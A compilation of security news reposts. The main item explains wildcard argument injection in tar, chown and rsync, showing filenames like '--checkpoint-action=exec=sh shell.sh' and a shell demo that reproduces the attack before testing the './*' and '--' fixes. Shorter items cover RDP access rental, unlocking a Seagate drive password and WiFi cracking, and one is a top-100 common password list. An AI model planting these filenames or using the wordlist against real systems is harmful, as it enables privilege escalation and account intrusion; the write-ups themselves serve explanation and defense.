Exploiting Wildcards On Linux/Unix


From: http://beta.slashdot.org/story/203895


DefenseCode released an advisory in which researcher Leon Juranic details security issues related to using wildcards in Unix commands. The topic has been discussed in the past on the Full Disclosure mailing list, where some people saw it more as a feature than as a bug.

There are clearly a number of potential security issues surrounding this, so Mr. Juranic provided five actual exploitation examples that highlight the risks of using the * wildcard with Linux/Unix commands.

The issue manifests through specific options of chown, tar, rsync and similar tools. Because the shell expands an unquoted * into a list of filenames before the command ever sees them, a filename that begins with a dash is indistinguishable from an option on the command line; by creating such specially crafted filenames, an attacker can inject arbitrary arguments into commands run by other users, root included.

One of the examples provided is the tar arbitrary command execution. The binary has two options that can be used for poisoning:

--checkpoint[=NUMBER]
display progress messages every NUMBERth record (default 10)

--checkpoint-action=ACTION
execute ACTION on each checkpoint

With these two options, tar runs the given action at every checkpoint. An exec action is handed to the shell, so it can be any command, including a malicious script, and it runs with the privileges of the user who started tar. "Tricking" root into passing these options is quite easy, and that is where the wildcard comes in handy.

Running tar cf archive.tar * on a folder with these files seems pretty straightforward and benign.

[root@defensecode public]# ls -al
drwxrwxrwx. 2 user user 4096 Oct 28 19:34 .
drwx------. 24 user user 4096 Oct 28 18:32 ..
-rw-rw-r--. 1 user user 20480 Oct 28 19:13 admin.php
-rw-rw-r--. 1 user user 34 Oct 28 17:47 ado.php
-rw-rw-r--. 1 user user 187 Oct 28 17:44 db.php
-rw-rw-r--. 1 user user 201 Oct 28 17:43 download.php

The problem arises if a user creates a couple of fake files, named like tar options, and a shell script containing arbitrary commands:

[root@defensecode public]# ls -al
drwxrwxrwx. 2 user user 4096 Oct 28 19:34 .
drwx------. 24 user user 4096 Oct 28 18:32 ..
-rw-rw-r--. 1 user user 20480 Oct 28 19:13 admin.php
-rw-rw-r--. 1 user user 34 Oct 28 17:47 ado.php
-rw-r--r--. 1 leon leon 0 Oct 28 19:19 --checkpoint=1
-rw-r--r--. 1 leon leon 0 Oct 28 19:17 --checkpoint-action=exec=sh shell.sh
-rw-rw-r--. 1 user user 187 Oct 28 17:44 db.php
-rw-rw-r--. 1 user user 201 Oct 28 17:43 download.php
-rwxr-xr-x. 1 leon leon 12 Oct 28 19:17 shell.sh

When tar is run with a bare * in this directory, the shell expands the wildcard to the filenames, tar parses the two option-shaped names as real options, and shell.sh is executed with the privileges of whoever ran tar, in this case root.

The advisory in question details other similar exploitation methods. Also, around the same time when Mr. Juranic informed us about his work, another researcher posted to the Full Disclosure mailing list a similarly themed research focused on exploiting wildcards.

Is there a workaround? To quote the most upvoted post on a recent Reddit thread regarding wildcard exploitation: "./* Done". Anchoring the glob as ./* makes every expanded name start with ./, which no option parser reads as a switch; ending option processing with -- before the wildcard (tar cf archive.tar -- *) has the same effect in GNU tar, chown and rsync. Note that ./* still skips dotfiles, exactly as a bare * does.
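The following script is an added example, not code from the DefenseCode advisory or the article. It reproduces the tar argument injection described above in a throwaway directory and then shows that both workarounds, the anchored ./* glob and a -- option terminator, prevent it. It assumes GNU tar (--checkpoint and --checkpoint-action are GNU extensions; bsdtar and busybox tar reject them). The injected action is "touch PWNED" instead of "sh shell.sh", so a successful injection leaves a marker file rather than launching a shell; the filenames and the PWNED marker are constructed for the demo.

```sh
#!/bin/sh
# Added example (not from the advisory): reproduce the tar wildcard argument
# injection in a scratch directory, then show the ./* and -- fixes.
# Assumes GNU tar for the injection to fire at all.
set -u

# bsdtar and busybox tar reject --checkpoint, so the injection only works on GNU tar.
have_gnu_tar() {
    tar --version 2>/dev/null | grep -q 'GNU tar'
}

# Create a scratch directory with ordinary files plus the two option-shaped
# filenames from the advisory. The action is "touch PWNED" (constructed for
# the demo) instead of "sh shell.sh", so success leaves a marker file.
setup_dir() {
    d=$(mktemp -d) || return 1
    printf 'hello\n' > "$d/admin.php"
    printf 'hello\n' > "$d/db.php"
    : > "$d/--checkpoint=1"
    : > "$d/--checkpoint-action=exec=touch PWNED"
    printf '%s\n' "$d"
}

# Archive the directory the way a careless cron job would, with a bare *.
# The shell expands * to the filenames, GNU tar treats --checkpoint=1 and
# --checkpoint-action=exec=... as real options, and runs the action.
# Exit status 0 means the injected command ran (marker present).
archive_unsafe() {
    ( cd "$1" && rm -f PWNED archive.tar && tar cf archive.tar * >/dev/null 2>&1 )
    [ -e "$1/PWNED" ]
}

# Same archive with the glob anchored: every expanded word starts with "./",
# which tar can only read as a path. A correct run therefore returns 1.
archive_safe_dotslash() {
    ( cd "$1" && rm -f PWNED archive.tar && tar cf archive.tar ./* >/dev/null 2>&1 )
    [ -e "$1/PWNED" ]
}

# Alternative fix: "--" ends option parsing, so every later word is a member
# name even when it starts with a dash. A correct run returns 1.
archive_safe_dashdash() {
    ( cd "$1" && rm -f PWNED archive.tar && tar cf archive.tar -- * >/dev/null 2>&1 )
    [ -e "$1/PWNED" ]
}

cleanup_dir() {
    rm -rf -- "$1"
}

# Stand-alone demonstration of all three invocations.
demo() {
    d=$(setup_dir) || return 1
    for variant in unsafe safe_dotslash safe_dashdash; do
        if "archive_$variant" "$d"; then
            echo "archive_$variant: injected command RAN"
        else
            echo "archive_$variant: injected command did not run"
        fi
    done
    cleanup_dir "$d"
}

demo
```

On a GNU tar system the first line of output reports that the injected command ran and the other two report that it did not; on bsdtar or busybox tar all three report "did not run" because the option-shaped names are rejected rather than executed.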


Hacked Via RDP: Really Dumb Passwords


From: http://krebsonsecurity.com/2013/12/hacked-via-rdp-really-dumb-passwords/

Businesses spend billions of dollars annually on software and hardware to block external cyberattacks, but a shocking number of these same organizations shoot themselves in the foot by poking gaping holes in their digital defenses and then advertising those vulnerabilities to attackers. Today’s post examines an underground service that rents access to hacked PCs at organizations that make this all-too-common mistake.


Bypassing Seagate ATA Security Lock


From: http://feedproxy.google.com/~r/hackaday/LgoM/~3/2sk-aqNfkZ0/


November 29, 2013

Here's a common story when it comes to password retrieval: a guy sets up a PC and, being very security-conscious, puts a password on his Seagate hard drive. Fast forward a few months, and the password is, of course, forgotten. The hard drive gets shuffled around between a few 'computer experts' in an attempt to solve the problem, and eventually winds up on [blacklotus89]'s workbench. Here's how he solved this problem.

What followed is a walk down Hackaday posts from years ago. [blacklotus] originally found one of our posts regarding the ATA password lock on a hard drive. After downloading the required tool, he found it only worked on WD hard drives, and not the Seagate sitting lifeless on his desk. Another Hackaday post proved to be more promising. By accessing the hard drive controller's serial port, [blacklotus] was able to see the first few lines of the memory and the buffer.

Two hours and two Python scripts later, [blacklotus] was able to dump the contents of his drive. He then took another Seagate drive, locked it, dumped it, and analyzed the data coming from this new locked drive. He found his own password in the dump and used the same method to look for the password on the old, previously impenetrable drive. It turns out the password for the old drive was set to '0000', an apparently highly secure password.

In going through a few forums, [blacklotus] found a lot of people asking for help with the same problem, and a lot of replies saying 'we don't know if this hard drive is yours so we can't help you.' It appears those code junkies didn't know how to unlock a hard drive either, so [blacklotus] put all his tools up on GitHub. Great work, and something that didn't end up as a Hackaday Fail of the Week as [blacklotus] originally expected.


How to Hack Wifi (and how to avoid being hacked): WEP/WPA/WPA2 | CodeBangers


From: http://codebangers.com/?p=249


This guide is meant to show how easy it is to hack wireless networks if the proper security measures are not in place. First I will show how to hack a WEP or WPA/WPA2 network, and then I will give tips on how to avoid getting hacked.

This is important information in our techno-savvy culture. If your wireless network is compromised you can be liable for any illegal activity on it. There are numerous stories of child pornographers and black-hat hackers using other people's wireless networks.

NOTE: Hacking your neighbors' or anyone else's Wifi without their permission is ILLEGAL. Be smart!


HackTalk’s Top 100 Passwords of 2012 | HackTalk


From: http://blog.hacktalk.net/hacktalks-top-100-passwords-of-2012/

Here's my list of the Top 100 Passwords of 2012. Note that there are only 99 since the most common password, with 24424 hits, was blank...

These passwords are ordered from most frequent to least.

123456
111111
123456789
password
123
12345678
000000
123123
welcome
12345
654321
ninja
abc123
1234
1234567
1
123321
qwerty
666666
iloveyou
sunshine
princess
abcd1234
5201314
888888
monkey
michael
aaaaaa
112358
freedom
123456jcow
record_created
password1
writer
record_modified
baseball
0
jcow
shadow
881022
tigger
dragon
computer
alonelypuma
success
jordan
123654
football
whatever
superman
michelle
08416263aaaaaa
159753
06092684
purple
ashley
112233
ginger
1234567890
maggie
daniel
love
justin
jasmine
rainbow
1q2w3e4r
samantha
pepper
121212
jennifer
charlie
333333
family
cookie
acm
babygirl
1a1a1a1b
115599
thomas
joshua
associated
5025578
31415926
william
the
nicole
buster
blessed
314159
money
lovely
destiny
butterfly
brandon
anthony
angels
1qaz2wsx
hunter
crystal
